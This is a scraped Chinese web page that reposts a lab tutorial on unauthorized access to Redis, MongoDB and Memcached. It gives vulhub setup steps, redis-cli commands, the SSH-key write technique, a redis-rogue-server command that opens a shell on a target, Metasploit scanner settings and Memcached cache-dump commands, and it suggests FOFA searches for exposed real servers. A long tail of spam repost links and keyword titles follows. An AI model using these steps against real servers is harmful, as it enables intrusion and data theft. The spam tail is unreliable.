当前位置: 首页 > news >正文 网站建设财务处理wordpress关键词内链 news 2025/11/5 23:33:26 网站建设财务处理,wordpress关键词内链,网站建设制作模板网站怎么做,wordpress 会员开卡消费Redis未授权访问漏洞 Redis 默认情况下#xff0c;会绑定在 0.0.0.0:6379 #xff0c;如果没有进行采用相关的策略#xff0c;比如添加防火墙规则避免其他非信任来源 ip 访问等#xff0c;这样将会将 Redis 服务暴露到公网上#xff0c;如果在没有设置密码认证(一般为空)的…Redis未授权访问漏洞 Redis 默认情况下会绑定在 0.0.0.0:6379 如果没有进行采用相关的策略比如添加防火墙规则避免其他非信任来源 ip 访问等这样将会将 Redis 服务暴露到公网上如果在没有设置密码认证(一般为空)的情况下会导致任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下利用 Redis 自身的提供的config 命令可以进行写文件操作攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的 authotrized_keys 文件中进而可以使用对应私钥直接使用ssh服务登录目标服务器。 产生条件 1.redis绑定在 0.0.0.0:6379且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略直接暴露在公网; 2.没有设置密码认证(一般为空)可以免密码远程登录redis服务 4.x/5.x未授权访问 步骤一:进入vulhub目录使用以下命令启动靶机. 进入目录:cd /vulhub-master/redis/4-unacc 启动:docker-compose up-d 检查:docker-compose ps 步骤二:在Kali上安装redis程序进行服务的链接 #安装redis apt-get install redis #redis链接 redis-cli -h192.168.4.176-p 6379 #redis常见命令(1)查看信息:info(2)删除所有数据库内容:flushall 3刷新数据库:flushdb 4看所有键:KEYS *使用select num可以查看键值数据。 5)设置变量:set testwhoami 6)config set dir dirpath 设置路径等配置 7config get dir/dbfilename 获取路径及数据配置信息 8save保存(9)get 变量查看变量名称 fofa搜索未授权的网站 port6379 步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞间.….下载以下攻击项目.. https://github.com/n0b0dyCN/redis-rogue-server 步骤四:使用工具执行以下命令获取目标的命令执行环境交互时输入i 键会获取Shell环境 python3 redis-rogue-server.py--rhost 192.168.4.176--lhost 192.168.4.108 --------------------------------------- MongoDB未授权访问漏洞 开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。 漏洞原因 造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 --auth 也很少会有人会给数据库添加上账号密码(默认空口令)使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。 漏洞复现 步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境.. 拉取镜像:docker pull mongo 启动容器:dockerrun-dp27017:27017mongodb mongo--name 查看容器:docker ps -a 镜像拉不下来去fofa搜索语句 port27017 打开Navicat一个一个测试连接 也可尝试使用MSF中的模块进行漏洞测试..不需要认证即可直接连接.. use auxiliary/scanner/mongodb/mongodb_loginshow options set rhosts 192.168.4.128 set threads 15 exploit ------------------------------------------ Memcached未授权访问漏洞 Memcached 是一套常用的 key-value 分布式高速缓存系统由于 Memcached 的安全设计缺陷没有权限控制模块所以对公网开放的Memcache服务很容易被攻击者扫描发现攻击者无需认证通过命令交互可直接读取 Memcached中的敏感信息。 漏洞复现 步骤一:下载Memcached程序并执行以下命令..启动Memcached漏洞环境 #Memcached程序下载 https://www.121down.com/soft/softview-28366.htmlhttps://www.runoob.com/memcached/window-install-memcached.html #执行命令 memcached.exe -d install memcached.exe -d start 步骤二:使用Telnet程序探测目标的11211端口. #Telnet探测 telnet 192.168.4.199 11211 #操作命令 stats //查看memcache服务状态 stats items //查看所有items stats cachedump 390//获得缓存key get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容造成敏感信息泄露 步骤三:使用Nmap程序的脚本进行漏洞扫描… 漏洞修复1.设置Memchached只允许本地访问2.禁止外网访问Memcached 11211端口。3.配置访问控制策略。4.最小化权限运行。5.修改默认端口等。 文章转载自: http://www.morning.rcjwl.cn.gov.cn.rcjwl.cn http://www.morning.gnkdp.cn.gov.cn.gnkdp.cn http://www.morning.qnzld.cn.gov.cn.qnzld.cn http://www.morning.fjptn.cn.gov.cn.fjptn.cn http://www.morning.pzlhq.cn.gov.cn.pzlhq.cn http://www.morning.xnlj.cn.gov.cn.xnlj.cn http://www.morning.pmysp.cn.gov.cn.pmysp.cn http://www.morning.hqykb.cn.gov.cn.hqykb.cn http://www.morning.bkfdf.cn.gov.cn.bkfdf.cn http://www.morning.sfrw.cn.gov.cn.sfrw.cn http://www.morning.lkkgq.cn.gov.cn.lkkgq.cn http://www.morning.cqwb25.cn.gov.cn.cqwb25.cn http://www.morning.ptxwg.cn.gov.cn.ptxwg.cn http://www.morning.qrzwj.cn.gov.cn.qrzwj.cn http://www.morning.ctfwl.cn.gov.cn.ctfwl.cn http://www.morning.tkjh.cn.gov.cn.tkjh.cn http://www.morning.dtlqc.cn.gov.cn.dtlqc.cn http://www.morning.dyhlm.cn.gov.cn.dyhlm.cn http://www.morning.qgxnw.cn.gov.cn.qgxnw.cn http://www.morning.lgxzj.cn.gov.cn.lgxzj.cn http://www.morning.phjyb.cn.gov.cn.phjyb.cn http://www.morning.lokext.com.gov.cn.lokext.com http://www.morning.drfrm.cn.gov.cn.drfrm.cn http://www.morning.ydyjf.cn.gov.cn.ydyjf.cn http://www.morning.xdmsq.cn.gov.cn.xdmsq.cn http://www.morning.bpmfr.cn.gov.cn.bpmfr.cn http://www.morning.mjctt.cn.gov.cn.mjctt.cn http://www.morning.nzhzt.cn.gov.cn.nzhzt.cn http://www.morning.mfbcs.cn.gov.cn.mfbcs.cn http://www.morning.yhpq.cn.gov.cn.yhpq.cn http://www.morning.mjbnp.cn.gov.cn.mjbnp.cn http://www.morning.hqpyt.cn.gov.cn.hqpyt.cn http://www.morning.qbwbs.cn.gov.cn.qbwbs.cn http://www.morning.zsyqg.cn.gov.cn.zsyqg.cn http://www.morning.dmldp.cn.gov.cn.dmldp.cn http://www.morning.knjj.cn.gov.cn.knjj.cn http://www.morning.zwfgh.cn.gov.cn.zwfgh.cn http://www.morning.wxckm.cn.gov.cn.wxckm.cn http://www.morning.pphbn.cn.gov.cn.pphbn.cn http://www.morning.lrzst.cn.gov.cn.lrzst.cn http://www.morning.bfjyp.cn.gov.cn.bfjyp.cn http://www.morning.cwcdr.cn.gov.cn.cwcdr.cn http://www.morning.lfqtp.cn.gov.cn.lfqtp.cn http://www.morning.gsjfn.cn.gov.cn.gsjfn.cn http://www.morning.hwhnx.cn.gov.cn.hwhnx.cn http://www.morning.crtgd.cn.gov.cn.crtgd.cn http://www.morning.lzdbb.cn.gov.cn.lzdbb.cn http://www.morning.trzzm.cn.gov.cn.trzzm.cn http://www.morning.tbstj.cn.gov.cn.tbstj.cn http://www.morning.ggxbyhk.cn.gov.cn.ggxbyhk.cn http://www.morning.pplxd.cn.gov.cn.pplxd.cn http://www.morning.jppb.cn.gov.cn.jppb.cn http://www.morning.chfxz.cn.gov.cn.chfxz.cn http://www.morning.fcxt.cn.gov.cn.fcxt.cn http://www.morning.zlhbg.cn.gov.cn.zlhbg.cn http://www.morning.yhwmg.cn.gov.cn.yhwmg.cn http://www.morning.tbqdm.cn.gov.cn.tbqdm.cn http://www.morning.sqmlw.cn.gov.cn.sqmlw.cn http://www.morning.yongkangyiyuan-pfk.com.gov.cn.yongkangyiyuan-pfk.com http://www.morning.syrzl.cn.gov.cn.syrzl.cn http://www.morning.ktrzt.cn.gov.cn.ktrzt.cn http://www.morning.mxlwl.cn.gov.cn.mxlwl.cn http://www.morning.fslxc.cn.gov.cn.fslxc.cn http://www.morning.lsfzq.cn.gov.cn.lsfzq.cn http://www.morning.zcckq.cn.gov.cn.zcckq.cn http://www.morning.tpqzs.cn.gov.cn.tpqzs.cn http://www.morning.gtcym.cn.gov.cn.gtcym.cn http://www.morning.xesrd.com.gov.cn.xesrd.com http://www.morning.flncd.cn.gov.cn.flncd.cn http://www.morning.pzrnf.cn.gov.cn.pzrnf.cn http://www.morning.qxlxs.cn.gov.cn.qxlxs.cn http://www.morning.nrrzw.cn.gov.cn.nrrzw.cn http://www.morning.tslwz.cn.gov.cn.tslwz.cn http://www.morning.qyxwy.cn.gov.cn.qyxwy.cn http://www.morning.cwgfq.cn.gov.cn.cwgfq.cn http://www.morning.kllzy.com.gov.cn.kllzy.com http://www.morning.rwyw.cn.gov.cn.rwyw.cn http://www.morning.trpq.cn.gov.cn.trpq.cn http://www.morning.ztrht.cn.gov.cn.ztrht.cn http://www.morning.nwqyq.cn.gov.cn.nwqyq.cn 查看全文 http://www.tj-hxxt.cn/news/280724.html 相关文章: 杭州网站开发公司网站设计论文前言 番禺做网站价格wordpress 作者归档 优化网站关键词动漫制作专业就业前景文字 做瞹瞹网站太原注册公司在哪个网站申请 山东省青州市建设局网站wordpress 劣势 网站建设的运作原理南京浦口网站建设 网站下拉框怎么做贵州国龙翔建设有限公司网站 3g免费网站制作做网站注册什么性质的公司 企业网站推广联系方式嘉兴php网站开发 福田网站建设课程考试环保公司网站架构怎么做 个人做网站需要学什么只是优秀的国外设计网站 要加强网站内容的建设专业行业网站建设 php网站后台上传不了图片专业的传媒行业网站开发 淘客怎样做自己的网站wordpress4.7.2写文章 创意产品设计网站推荐wordpress调用数据库 阿里云服务器上传网站怎么安装wordpress模板 做单挣钱的网站门户网站注意事项 南宁网站建设制作定制凡客诚品售后服务有哪些 做网站一般注意些什么公司网站服务类型怎么填 网站服务器维护技术wordpress header.php在哪里 台式机网站建设网站建设意见建议 php网站连接数据库教程自媒体平台哪个好 上海网站设计开发公司软文网站模板 行业协会网站建设的方案天津建设工程信息网官网首页 数字创意设计包括哪些案例免费优化网站建设 做网站的有哪些公司搞个平台要花多少钱 搭建网站一条龙qq注册账号免费申请 长沙建站公司四川住房和城乡建设厅官方网站 h5 网站模板北京注册公司要多少钱才能注册 建设网站简单的需要多少天网站公司广州
